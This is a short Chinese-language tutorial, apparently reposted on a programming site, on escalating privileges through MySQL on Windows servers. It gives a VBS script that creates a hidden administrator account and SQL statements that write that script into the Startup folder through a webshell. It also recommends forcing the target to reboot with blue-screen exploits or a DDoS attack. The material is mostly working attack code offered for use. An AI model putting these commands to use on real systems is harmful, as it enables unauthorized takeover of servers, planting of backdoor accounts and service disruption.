概述
提权原理
利用Mysql,将后门文件写入开机自启动项,同时因为是开机自启动,再写入之后,需要重启目标服务器(这个要求mysql的权限就很高,至少是管理员权限,甚至是system),该实验只能在windows中使用。
提权方式
第一种:如果" C:Documents and SettingsAll Users「开始」菜单程序启动 "目录存在可读写的权限,那么我们可以直接将VBS提权脚本上传到该目录下!
setwsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Setoe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","secist")
od.SetPassword "secist.com"
od.SetInfo
Set of=GetObject(os&"/secist",user)
oe.add os&"/secist"
将以上代码保存为 .vbs 后缀的文件上传即可!
第二种方式:通过大马的MySQL执行功能,利用SQL命令来进行VBS脚本的创建及添加
create table secist(cmd text);
insert into secist values("set wshshell=createobject(""wscript.shell"")");
insert into secist values("a=wshshell.run(""cmd.exe /c net user secist secist.com /add"",0)");
insert into secist values("b=wshshell.run(""cmd.exe /c net localgroup administrators secist /add"",0)");
select * from secist into dumpfile "C:Documents and SettingsAll Users「开始」菜单程序启动secist.vbs";
成功执行以上命令后,只要管理员重启了服务器,我们就可以成功提权了!
相关补充
1、关于重启目标服务器,我们可以利用一些可导致服务器蓝屏的EXP,或者DDoS拒绝服务~
2、上传的目录必须具备可读写的权限
3、调用的 cmd 也必须有足够的权限
最后
以上就是孤独秀发为你收集整理的Mysql 开机启动项提权的全部内容,希望文章能够帮你解决Mysql 开机启动项提权所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复